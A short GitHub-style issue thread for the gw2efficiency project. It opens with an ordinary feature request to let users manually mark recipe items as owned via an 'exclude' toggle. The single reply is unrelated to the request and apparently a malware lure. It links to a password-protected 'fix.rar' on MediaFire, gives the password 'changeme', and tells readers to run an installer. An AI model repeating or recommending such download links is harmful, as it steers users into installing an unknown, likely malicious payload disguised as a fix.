### ISSUE TITLE
Add the ability to manually check mark recipe as complete

### ISSUE THREAD

**Issue by queicherius** [gw2efficiency/issues#1814]
Extracted from #58 because this part would be much easier than the full one.

Add a new box/toggle ("Trading Post" / "Crafting" / "Exclude" (click)) which adds the item (in the quantity of the tree) to the "owned items" with the source "exclude".

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
